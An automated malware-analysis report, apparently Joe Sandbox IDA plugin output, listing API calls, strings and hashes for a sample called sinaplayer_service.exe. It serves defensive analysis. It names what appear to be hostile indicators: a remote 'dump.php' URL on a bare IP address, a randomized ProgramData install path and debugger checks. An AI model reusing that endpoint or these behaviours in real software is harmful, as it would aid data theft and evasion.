                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 237780522-2556327735
                                                                                                                                                                                                    • Opcode ID: 8a47b92b879a48447ae90352e214d77584621fce325eb458b406be49d97e190c
                                                                                                                                                                                                    • Instruction ID: fb66b8c0c8bdd7f1c01a4dec0f8ff46ae80c6a79a826811157639804c230a50e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a47b92b879a48447ae90352e214d77584621fce325eb458b406be49d97e190c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31D0323106149B8B36DE5DE88096AF7AAFF81761310852EF59DCB650DB34F819C7A4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,8285FFAB,75919350,?,7591DF10,?,0039BE88,000000FF,?,0037F504,?,?,?,?,http://125.211.213.34/dump.php,0000001E), ref: 00390806
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(0039BE88,?,?,?,ufile,00000005,?,7591DF10), ref: 00390896
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@SystemTime
                                                                                                                                                                                                    • String ID: ufile
                                                                                                                                                                                                    • API String ID: 1521329016-1523282350
                                                                                                                                                                                                    • Opcode ID: 1dbf276620221981f4b4e42968217578196d15bfd6ff8dcbb00a3c3e947f8066
                                                                                                                                                                                                    • Instruction ID: 0920c9960788d0276488f104ec4f3d6ace00c129adc5f9402d56ce1c764b19c7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dbf276620221981f4b4e42968217578196d15bfd6ff8dcbb00a3c3e947f8066
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E313D72E04208AFCF15DFA8D981BEEB7F9EB08710F10452AF815E7690E7349954CBA4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                    • Opcode ID: eaffb736c70da9831b547ffc88d9b76e9718cc6a2c1efe1c865bc4693b0c627f
                                                                                                                                                                                                    • Instruction ID: 0a73b55bf7b5db397c9a9e3a4b7512e190709549a69dd7cdca8bd8f5b3ef1449
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaffb736c70da9831b547ffc88d9b76e9718cc6a2c1efe1c865bc4693b0c627f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60212B7554122596DB34CF59DC046BC33B0EF48B58F20860AECA49BB81E6708DC2C3B0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: amp$cpu
                                                                                                                                                                                                    • API String ID: 1333004437-2542064945
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,?,0037503E,00000000,?,?,?,?,?,00375150,?,?,?), ref: 003752D6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • invalid string position, xrefs: 003752D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@
                                                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                                                    • API String ID: 1960685668-1799206989
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,0039FC64,?,?,00392241,00000008,00000000), ref: 0038D58B
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,0039FC1C,0039FC64,?,?,00392241,00000008,00000000), ref: 0038D5A3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 1004598685-2556327735
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,6C631218,00000104,?,?,?,?,?,?,6C582903), ref: 6C582D4F
                                                                                                                                                                                                    • _malloc_crt.MSVCR120 ref: 6C582D9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName_malloc_crt
                                                                                                                                                                                                    • String ID: HD
                                                                                                                                                                                                    • API String ID: 2373854079-3471098148
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,?,00371452,00000000,?,?,?,?,?,0037155F,?,?,?), ref: 003716D6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • invalid string position, xrefs: 003716D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@
                                                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                                                    • API String ID: 1960685668-1799206989
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: void
                                                                                                                                                                                                    • API String ID: 1333004437-3531332078
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,8285FFAB,00000000,759218A0,?,h9,0039AB0B,000000FF,?,00381C9B,h9), ref: 00380F09
                                                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00380F32
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@ConvertString_com_util::
                                                                                                                                                                                                    • String ID: h9
                                                                                                                                                                                                    • API String ID: 113643578-554728239
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C581D5C: GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe,00000104,?,?,?,?,?,?,6C580E43), ref: 6C581D7A
                                                                                                                                                                                                      • Part of subcall function 6C581D5C: _malloc_crt.MSVCR120 ref: 6C581DC9
                                                                                                                                                                                                    • ___crtGetEnvironmentStringsW.LIBCMT ref: 6C580E66
                                                                                                                                                                                                      • Part of subcall function 6C5795B9: GetEnvironmentStringsW.KERNEL32(?,?,?,6C579DA3,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8,0000000C), ref: 6C5795BE
                                                                                                                                                                                                      • Part of subcall function 6C5795B9: _malloc_crt.MSVCR120(-00000002,00ED4598,?,?,6C579DA3,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8,0000000C), ref: 6C5795EB
                                                                                                                                                                                                      • Part of subcall function 6C5795B9: memcpy.MSVCR120(00000000,00000000,-00000002,00ED4598,?,?,6C579DA3,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8), ref: 6C5795FB
                                                                                                                                                                                                      • Part of subcall function 6C5795B9: FreeEnvironmentStringsW.KERNEL32(00000000,00ED4598,?,?,6C579DA3,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8,0000000C), ref: 6C579607
                                                                                                                                                                                                      • Part of subcall function 6C579704: wcslen.MSVCR120(00000000,?,00ED4598,?,6C579DAD,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8,0000000C), ref: 6C579727
                                                                                                                                                                                                    • ___mbtow_environ.LIBCMT ref: 6C5A3BAE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$_malloc_crt$FileFreeModuleName___crt___mbtow_environmemcpywcslen
                                                                                                                                                                                                    • String ID: HD
                                                                                                                                                                                                    • API String ID: 2833736322-3471098148
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,00000000), ref: 0038F24B
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 0038F271
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EventOverlappedResult
                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                    • API String ID: 1635899351-3772416878
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 003980BB: memset.MSVCR120 ref: 003980C8
                                                                                                                                                                                                      • Part of subcall function 00379E80: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,00398097,?,?,?,00371064), ref: 00379E83
                                                                                                                                                                                                      • Part of subcall function 00379E80: GetLastError.KERNEL32(?,?,?,00371064), ref: 00379E8D
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00371064), ref: 0039809B
                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00371064), ref: 003980AA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003980A5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinStringmemset
                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                    • API String ID: 1128651283-631824599
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _unlock.MSVCR120(?), ref: 6C564B8E
                                                                                                                                                                                                      • Part of subcall function 6C55EDFC: LeaveCriticalSection.KERNEL32(?,6C561CC7,0000000D,6C561C60), ref: 6C55EE09
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C5A51E2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalLeaveSection$_unlock
                                                                                                                                                                                                    • String ID: `bl
                                                                                                                                                                                                    • API String ID: 203654640-2297096494
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120 ref: 003854A9
                                                                                                                                                                                                    • free.MSVCR120 ref: 00385517
                                                                                                                                                                                                    • free.MSVCR120 ref: 0038551D
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,?,00010110,?,?,?,?,?,?,?,?,?,?,?,?,00385D03), ref: 00385542
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$mallocmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3401966785-0